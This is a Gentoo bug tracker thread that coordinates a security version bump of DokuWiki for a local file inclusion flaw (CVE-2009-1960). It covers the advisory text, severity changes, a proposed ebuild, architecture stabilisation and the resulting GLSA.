DokuWiki has released a patched version of their latest release to fix a "local file inclusion" bug. ------------------------------------------------------------------------------- A security hole was discovered which allows an attacker to include arbitrary files located on the attacked DokuWiki installation. The included file is executed in the PHP context. This can be escalated by introducing malicious code through uploading file via the media manager or placing PHP code in editable pages. ------------------------------------------------------------------------------- [ from http://bugs.splitbrain.org/index.php?do=details&task_id=1700 ] This replaces dokuwiki-2009-02-14, so this bug can replace the 4-month old Gentoo bug #259624. This is probably a simple version bump of the latest ebuild, so it shouldn't be hard to fix.
Setting whiteboard. Maintainer, please bump as necessary.
Shouldn't this be assigned to security? Doing so... Shouldn't this be C1, as this is a remote code execution issue? Changing from C3, also raising Severity from minor to major as such. Also changing summary to match the other sec bugs' style.
====================================================== Name: CVE-2009-1960 Status: Candidate URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1960 inc/init.php in DokuWiki 2009-02-14, rc2009-02-06, and rc2009-01-30, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via the config_cascade[main][default][] parameter to doku.php. NOTE: PHP remote file inclusion is also possible in PHP 5 using ftp:// URLs.
Ping. Any movement on this? It's been almost three weeks since this has been submitted.
Created attachment 195663 [details] Proposed ebuild I've attached a proposed ebuild for dokuwiki-20090214b. It ignores the issues brought up in #259624 about "EAPI=2 rework" (security presses more than upgrades), but needed to go a little further than just a rename of the ebuild: The source tarball is named with the trailing 'b', but it extracts into a directory without it. In src_unpack(), there was an existing rename of the folder, I just had it not use a variation of MY_PV instead of the previous use of MY_PV. I don't mess with ebuilds much, so someone should double check my changes. I have this installed and it seems to work for me.
Oh, and before that ebuild gets checked in to the tree, the arch keywords should get fixed.
I'm waiting for a bump, too. Anything besides the keywords in the way?
Arches, please test and mark stable: =www-apps/dokuwiki-20090214b Target keywords : "amd64 ppc sparc x86" Already stabled : "amd64" Missing keywords: "ppc sparc x86" +*dokuwiki-20090214b (29 Jun 2009) + + 29 Jun 2009; Alex Legler <a3li@gentoo.org> -dokuwiki-20080505.ebuild, + +dokuwiki-20090214b.ebuild: + Non-maintainer commit: Version bump for security bug 272431. amd64 stable. + Thanks to Philippe Chaintreuil for proposing an updated ebuild. Removing + vulnerable version in ~arch. +
x86 stable
sparc stable
ppc, ping
ppc stable.
Request filed.
GLSA 200908-09